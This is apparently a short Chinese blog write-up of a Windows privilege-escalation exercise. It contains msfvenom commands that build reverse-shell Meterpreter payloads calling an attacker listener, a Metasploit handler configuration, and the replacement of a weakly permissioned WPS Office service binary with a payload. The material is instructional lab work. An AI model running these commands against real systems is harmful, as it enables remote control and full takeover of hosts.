1、前言
在一次测试中,通过rce漏洞获得了目标主机meterpreter会话,尝试进行一些提权实验。
过程中两台机子都不通外网,本文记录一下获得会话并提权过程。
本文由“壹伴编辑器”提供技术支持
2、获取msf会话
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.122.135 LPORT=443 -f exe -o 666.exe
msfconsole -q -r '/home/yanghao/windows-meterpreter-staged-reverse-tcp-443-exe.rc'
use exploit/multi/handlerset PAYLOAD windows/meterpreter/reverse_tcpset LHOST 192.168.122.135set LPORT 443set ExitOnSession falseset EnableStageEncoding trueset EnableUnicodeEncoding trueset AutoRunScript 'post/windows/manage/migrate' run -j
本文由“壹伴编辑器”提供技术支持
3、尝试提权
localexploitsuggester 模块失败
use post/multi/recon/local_exploit_suggester
柳暗花明 (enum_services利用)
use post/windows/gather/enum_services
cacls wpscloudsvr.exe
查看文件权限,发现权限设置不当,标准用户可以对其更改 (图找不到了,大概结果就像下面这样),msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.122.135 LPORT=8522 -f exe-service -o wpscloudsvr.exe
uplaod /xx/xx/wpscloudsvr.exe "D:\Program Files\WPS Office\wpscloudsvr.exe"
shell>net start wpscloudsvr
本文由“壹伴编辑器”提供技术支持
4、总结
-
1、使用metasploit脚本进行自动化设置
-
2、metasploit本地提权漏洞扫描、利用,相关信息收集模块使用;
-
3、服务可执行文件权限设置不当的cacls检查、exe-service载荷生成、替换执行提权。
本文由“壹伴编辑器”提供技术支持
5、参考
end
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论